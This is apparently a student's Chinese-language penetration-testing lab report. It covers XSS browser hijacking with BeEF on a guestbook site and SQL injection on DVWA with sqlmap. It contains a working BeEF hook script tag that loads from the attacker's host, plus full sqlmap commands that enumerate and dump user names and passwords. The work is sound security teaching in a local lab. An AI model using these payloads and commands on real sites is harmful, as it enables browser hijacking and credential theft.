首页 > 数据库 >网络渗透测试_3_XSS和SQL注入

网络渗透测试_3_XSS和SQL注入

时间:2022-12-01 16:47:43浏览次数:377  
标签:XSS 截图 渗透 数据库 Submit -- dvwa SQL

以下内容为课堂实验记录。

1. 实验目的和要求

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

2. 实验步骤

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

对留言簿网站进行扫描,发现存在可能被攻击的XSS漏洞。

 

 

 

 

 

2、Kali使用beef生成恶意代码,截图。

 

使用beef-xss指令可以生成恶意代码,也就是HOOK那一栏的代码,IP改成自己本机的IP就行了。

 

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

 

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。

 

 

 

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

 

当客户端登入审核留言板的页面时,会发现beef中出现了目标主机,在beef中进行如下项的修改,再点击Execute,就会向客户端发出命令。回到客户端时发现已经跳转到了指定的网站。

 

 

 

 

SQL注入部分:DVWA+SQLmap+Mysql注入实战

 

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,返回:

ID: 1

First name: admin

Surname: admin

 

 

返回正常;

再次输入1',报错,返回:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDBserver version for the right syntax to use near '1''' at line 1

此时可以断定有SQL注入漏洞,下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

 

2、枚举当前使用的数据库名称和用户名。

 

 

 

sqlmap -u "http://192.168.200.128/dvwa/vulnerabilities/sqli/?id=%271%27&Submit=Submit#" --cookie="security=low;PHPSESSID=88bd45fb9d599c13d1d3b6000eac2e00" --batch --current-db --current-user

 

 

 

 

Sqlmap输出截图:

 

 

 

 

3、枚举数据库用户名和密码

 

 

你输入的命令:

sqlmap -u "http://192.168.200.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=e5a626d1188a6ddd7610268179af6ee8' -b --users --password

 

Sqlmap输出截图。

 

 

 

 

 

 

4、枚举数据库

--dbs:枚举当前数据库

你输入的命令:

sqlmap -u "http://192.168.200.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=e5a626d1188a6ddd7610268179af6ee8' -b -dbs

Sqlmap输出截图。

 

 

 

5、枚举数据库和指定数据库的数据表

 

 -D 数据库名:指定数据库

 

--tables:枚举指定数据库的所有表

 

你输入的命令:

 

sqlmap -u "http://192.168.200.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=e5a626d1188a6ddd7610268179af6ee8' -D dvwa --tables 

 

Sqlmap输出截图。

 

 

 

 

 

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.200.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=e5a626d1188a6ddd7610268179af6ee8' -D dvwa -T users --columns

 

Sqlmap输出截图。

 

 

 

7、枚举指定数据表中的所有用户名与密码,并down到本地。

 

-C:枚举数据表中的列

 

--dump:存储数据表项

 

你输入的命令:

 

sqlmap -u "http://192.168.200.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=e5a626d1188a6ddd7610268179af6ee8' -D dvwa -T users -C user,password --dump

 

Sqlmap输出截图。

 

 

 

 

 

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

 

标签:XSS,截图,渗透,数据库,Submit,--,dvwa,SQL
From: https://www.cnblogs.com/H4RUH1RO/p/16941803.html

相关文章

  • 网络渗透测试_2_网络嗅探与身份认证
    以下内容为课堂实验记录。1. 实验目的和要求实验目的:1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协......
  • mysql间隙锁加锁11个规则
        间隙锁是在可重复读隔离级别下才会生效的:next-keylock实际上是由间隙锁加行锁实现的,如果切换到读提交隔离级别(read-committed)的话,就好理解了,过程中去掉......
  • 网络渗透测试实验_1_网络扫描与网络侦察
    以下内容为课堂上的实验记录1. 实验目的和要求理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗......
  • Docker 安装 MySQL
    1、查看可用的MySQL版本访问MySQL镜像库地址:https://hub.docker.com/_/mysql?tab=tags 。可以通过Sortby查看其他版本的MySQL,默认是最新版本 mysql:latest 。......
  • 刚写完的一个用户遍历更新的SQL存储过程,分享一下吧
    setANSI_NULLSONsetQUOTED_IDENTIFIERONgo/*填充用户评价等级*/ALTERPROC[dbo].[Fill_Userinfos_BuyerRank_SellerRank]@useridVARCHAR(12)=NULLASB......
  • SQL Server 无法创建索引并且显示灰色
    一、问题描述:选择要创建的表,点击右键,会弹出属性菜单,但是“新建索引”显示灰色,无法进行创建,有些表是可以创建,如下图: 那么为什么会出现这样的原因呢?网上有的人说数据库有问题......
  • MYSQL IN 是否走索引?
    准备工作CREATETABLEt(idINTNOTNULLAUTO_INCREMENT,key1VARCHAR(100),common_fieldVARCHAR(100),PRIMARYKEY(id),KEYidx_key1(ke......
  • MySQL 间隙锁导致的死锁场景分析
    实际业务场景在我们使用mysql的时候,如果不注意间隙锁容易引起死锁,最近分析一个业务场景就是间隙锁导致的死锁,业务抽象如下:系统有一个批量新增业务资源的功能,实现逻辑如下......
  • MySQL数据库-数据完整性-笔记
    数据完整性一个数据库就是一个完整的业务单元,可以包含多张表,数据被存储在表中在表中为了更加准确的存储数据,保证数据的正确有效,可以在创建表的时候,为表添加一些强制性的验证......
  • sql server 多字段查询重复记录并删除
    --查询重复的记录SELECTa.*FROMContacta,(SELECTCust_ID,Contact_NameFROMContactGROUPBYCust_ID,Contact_NameHAVINGCOUNT(1)>1)ASbWHEREa.Cust_ID=b.Cust_I......